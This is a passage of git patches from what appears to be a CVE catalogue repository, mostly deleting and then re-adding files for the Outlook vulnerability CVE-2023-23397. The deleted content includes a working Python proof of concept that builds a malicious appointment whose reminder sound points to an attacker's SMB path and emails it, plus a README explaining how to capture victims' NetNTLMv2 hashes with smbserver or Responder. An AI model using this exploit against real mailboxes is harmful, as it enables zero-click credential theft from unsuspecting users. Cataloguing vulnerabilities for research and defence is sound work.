- msg['From'] = self.username - msg['To'] = COMMASPACE.join(self.recipient) - msg['Date'] = formatdate(localtime=True) - msg['Subject'] = subject - - msg.attach(MIMEText(body)) - - with open(attachment_path, 'rb') as f: - part = MIMEApplication(f.read(), Name=attachment_path) - part['Content-Disposition'] = f'attachment; filename="{attachment_path}"' - msg.attach(part) - - try: - server = smtplib.SMTP(self.smtp_server, self.port) - server.starttls() - server.login(self.username, self.password) - server.sendmail(self.username, self.recipient, msg.as_string()) - server.quit() - print("[+] Malicious appointment sent !") - - - except Exception as e: - print("[-] Error with SMTP server...", e) - -parser = argparse.ArgumentParser(description='CVE-2023-23397 POC : send a malicious appointment to trigger NetNTLM authentication.') -parser.add_argument('-p', '--path', type=str, help='Local path to process', required=True) -args = parser.parse_args() - -appointment = Message() -appointment.message_class = "IPM.Appointment" -appointment.subject = "CVE-2023-23397" -appointment.body = "New meeting now !" -appointment.location = "Paris" -appointment.appointment_start_time = datetime.datetime.now() -appointment.appointment_end_time = datetime.datetime.now() -appointment.reminder_override_default = True -appointment.reminder_sound_file = args.path -appointment.save("appointment.msg") - -email = Email(smtp_server, smtp_port, sender_email, sender_password, recipients_email) - -subject = "Hello There !" -body = "Important appointment !" -email.send(subject, body, "appointment.msg") diff --git a/cve/Outlook/CVE-2023-23397/README.md b/cve/Outlook/CVE-2023-23397/README.md deleted file mode 100644 index 094e829d..00000000 --- a/cve/Outlook/CVE-2023-23397/README.md +++ /dev/null @@ -1,41 +0,0 @@ -# CVE-2023-23397 - -Simple and dirty PoC of the CVE-2023-23397 vulnerability impacting the Outlook thick client. - -## Description - -Outlook suffers from a lack of control over the user input that allows to configure the sound of a meeting and appointment reminder. Indeed, an attacker is able to force a victim to make a connection to its server without any manipulation from the user (zero click vulnerability). - -An attacker exploiting this vulnerability retrieves a NetNTLMv2 digest based on the password of the trapped user through an SMB request. The request is triggered as soon as the mail arrives in the inbox. - -## What does the poc do? - -1. Generated `.msg` payload. -2. Send it by email with custom SMTP server. - -## Usage - -In one session : - -```python -python CVE-2023-23397.py - -usage: CVE-2023-23397.py [-h] -p PATH -CVE-2023-23397.py: error: the following arguments are required: -p/--path - -python CVE-2023-23397.py --path '\\yourip\' -``` - -In a second session (`smbserver` or `responder` as you want). - -``` -smbserver.py -smb2support SHARE . -``` - -## Demo (manual poc) - -![poc](poc.gif) - -## Original article - -https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/ \ No newline at end of file -- Gitee From 6238732f9d00091af0e82a962012d41548b48d2e Mon Sep 17 00:00:00 2001 From: Victoria Date: Wed, 22 Mar 2023 15:16:12 +0000 Subject: [PATCH 21/24] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/Outlook/yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Outlook/yaml/CVE-2023-23397.yaml | 19 ------------------- 1 file changed, 19 deletions(-) delete mode 100644 cve/Outlook/yaml/CVE-2023-23397.yaml diff --git a/cve/Outlook/yaml/CVE-2023-23397.yaml b/cve/Outlook/yaml/CVE-2023-23397.yaml deleted file mode 100644 index f5183573..00000000 --- a/cve/Outlook/yaml/CVE-2023-23397.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: CVE-2023-23397 -source: https://github.com/Trackflaw/CVE-2023-23397 -info: - name: Microsoft Outlook 特权提升漏洞。Outlook缺乏对允许配置会议和约会提醒声音的用户输入的控制,攻击者能够强制受害者连接到其服务器,而无需用户进行任何操作(零点击漏洞)。利用此漏洞的攻击者通过SMB请求根据受困用户的密码检索NetNTLMv2摘要。一旦邮件到达收件箱,请求就会被触发。 - severity: critical - description: | - Outlook suffers from a lack of control over the user input that allows to configure the sound of a meeting and appointment reminder. Indeed, an attacker is able to force a victim to make a connection to its server without any manipulation from the user (zero click vulnerability). - scope-of-influence: - outlook-2013, outlook-2016, outlook-2019,microsoft:office:2021,microsoft:office:2019 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2023-23397 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2023-23397 - cwe-id: CWE-294 - cnvd-id: None - kve-id: None - tags: Microsoft, Outlook, cve2023, 权限提升漏洞 \ No newline at end of file -- Gitee From 63dcf28200f9571ec5b199af64b899baa366d4c5 Mon Sep 17 00:00:00 2001 From: Victoria Date: Wed, 22 Mar 2023 15:16:28 +0000 Subject: [PATCH 22/24] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/Outlook/2023/yaml/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Outlook/2023/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/Outlook/2023/yaml/.keep diff --git a/cve/Outlook/2023/yaml/.keep b/cve/Outlook/2023/yaml/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 1abe071efbfd44b53358ece848358b03c91c3645 Mon Sep 17 00:00:00 2001 From: Victoria Date: Wed, 22 Mar 2023 15:24:29 +0000 Subject: [PATCH 23/24] update other_list.yaml. Signed-off-by: Victoria --- other_list.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/other_list.yaml b/other_list.yaml index 428354b0..6dcfa282 100644 --- a/other_list.yaml +++ b/other_list.yaml @@ -13,6 +13,8 @@ cve: - CVE-2023-0179 polkit: - CVE-2021-3560 + Outlook: + - CVE-2023-23397 redis: - CVE-2022-0543 EsFileExplorer: -- Gitee From be3585a93216181fa8be7f4e2e0a7da19df05190 Mon Sep 17 00:00:00 2001 From: Victoria Date: Thu, 23 Mar 2023 02:54:16 +0000 Subject: [PATCH 24/24] update cve/Outlook/2023/yaml/CVE-2023-23397.yaml. Signed-off-by: Victoria --- cve/Outlook/2023/yaml/CVE-2023-23397.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cve/Outlook/2023/yaml/CVE-2023-23397.yaml b/cve/Outlook/2023/yaml/CVE-2023-23397.yaml index f5183573..11f0fd08 100644 --- a/cve/Outlook/2023/yaml/CVE-2023-23397.yaml +++ b/cve/Outlook/2023/yaml/CVE-2023-23397.yaml @@ -4,9 +4,9 @@ info: name: Microsoft Outlook 特权提升漏洞。Outlook缺乏对允许配置会议和约会提醒声音的用户输入的控制,攻击者能够强制受害者连接到其服务器,而无需用户进行任何操作(零点击漏洞)。利用此漏洞的攻击者通过SMB请求根据受困用户的密码检索NetNTLMv2摘要。一旦邮件到达收件箱,请求就会被触发。 severity: critical description: | - Outlook suffers from a lack of control over the user input that allows to configure the sound of a meeting and appointment reminder. Indeed, an attacker is able to force a victim to make a connection to its server without any manipulation from the user (zero click vulnerability). + Outlook suffers from a lack of control over the user input that allows to configure the sound of a meeting and appointment reminder. Indeed, an attacker is able to force a victim to make a connection to its server without any manipulation from the user (zero click vulnerability). scope-of-influence: - outlook-2013, outlook-2016, outlook-2019,microsoft:office:2021,microsoft:office:2019 + outlook-2013, outlook-2016, outlook-2019 reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-23397 classification: -- Gitee